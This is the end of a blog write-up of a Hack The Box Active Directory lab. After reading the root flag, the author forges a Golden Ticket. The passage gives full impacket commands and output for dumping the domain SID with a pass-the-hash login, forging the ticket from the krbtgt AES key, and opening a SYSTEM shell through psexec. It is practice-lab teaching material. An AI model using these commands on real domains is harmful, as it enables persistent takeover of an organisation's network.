Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersAdministratorDocuments>

root.txt

*Evil-WinRM* PS C:UsersAdministratorDesktop> cat root.txt
f2ef42************************

Post Root

Golden Ticket

I wanted to delve deeper into the box by exploring some persistence techniques. I decided to give the Golden Ticket a shot! That’s when my friend/mentor, 0xCOFFEE, came to my rescue. The following note from him really helped me achieve this.

Pass the Ticket | 0xBEN | Notes
6GEKk7G65xr0tD6l pour overnotes.benheater.com

Prerequisites

In order to generate a Golden Ticket, we require the following two things:

  1. Krbtgt AES Key
  2. Domain SID

Note that, we already have the AES Key for the krbtgt account from the DCSync Attack we just performed above.

Step #01: Domain SID

I used impacket-lookupsid along with the administrator account in order to dump the Domain SID:

croc@hacker:~$ impacket-lookupsid -hashes 'aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e' 'administrator.htb/administrator@10.10.11.42'         
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.10.11.42
[*] StringBinding ncacn_np:10.10.11.42[pipelsarpc]
[*] Domain SID is: S-1-5-21-1088858960-373806567-254189436
498: ADMINISTRATOREnterprise Read-only Domain Controllers (SidTypeGroup)
500: ADMINISTRATORAdministrator (SidTypeUser)
501: ADMINISTRATORGuest (SidTypeUser)
502: ADMINISTRATORkrbtgt (SidTypeUser)
512: ADMINISTRATORDomain Admins (SidTypeGroup)
513: ADMINISTRATORDomain Users (SidTypeGroup)
514: ADMINISTRATORDomain Guests (SidTypeGroup)
515: ADMINISTRATORDomain Computers (SidTypeGroup)
516: ADMINISTRATORDomain Controllers (SidTypeGroup)
517: ADMINISTRATORCert Publishers (SidTypeAlias)
518: ADMINISTRATORSchema Admins (SidTypeGroup)
519: ADMINISTRATOREnterprise Admins (SidTypeGroup)
520: ADMINISTRATORGroup Policy Creator Owners (SidTypeGroup)
521: ADMINISTRATORRead-only Domain Controllers (SidTypeGroup)

Step#2: Generate the Ticket

Further, I used the impacket-ticketer to generate the ticket:

croc@hacker:~$ impacket-ticketer -aesKey 'aadb89e07c87bcaf9c540940fab4af94' -domain-sid 'S-1-5-21-1088858960-373806567-254189436' -domain 'administrator.htb' -dc-ip '10.10.11.42' -user-id '500' 'Administrator'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for administrator.htb/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache

Here,

-aesKeySpecifies the AES Key for the krbtgt account
-domain-sidSpecifies the Domain SID
-user-idSpecifies the Administrator RID

Step#3: Test Out!

While specifying the KRB5CCNAME environment variable equal to the ticket we just generated, I used psexec to get remote access as the administrator user and it worked flawlessly!

croc@hacker:~$ KRB5CCNAME=Administrator.ccache faketime "$(ntpdate -q dc.administrator.htb | cut -d ' ' -f 1,2)" impacket-psexec -k -no-pass -dc-ip 10.10.11.42 'administrator.htb/administrator@DC.administrator.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on DC.administrator.htb.....
[*] Found writable share ADMIN$
[*] Uploading file YwxhjLVC.exe
[*] Opening SVCManager on DC.administrator.htb.....
[*] Creating service oZXF on DC.administrator.htb.....
[*] Starting service oZXF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:Windowssystem32> whoami
nt authoritysystem

Written by

Croclius

Croclius

Ethical Hacker / Penetration Tester

View all posts →

Join my Newsletter

Stay in the loop.

The latest writeups, research, and offensive security insights — delivered straight to your inbox. No spam, ever.

Please enter your first name.
Please enter a valid email address.

No spam, ever. Unsubscribe anytime.

Comments

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

You May Also Like..

Powered by  GDPR Cookie Compliance
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.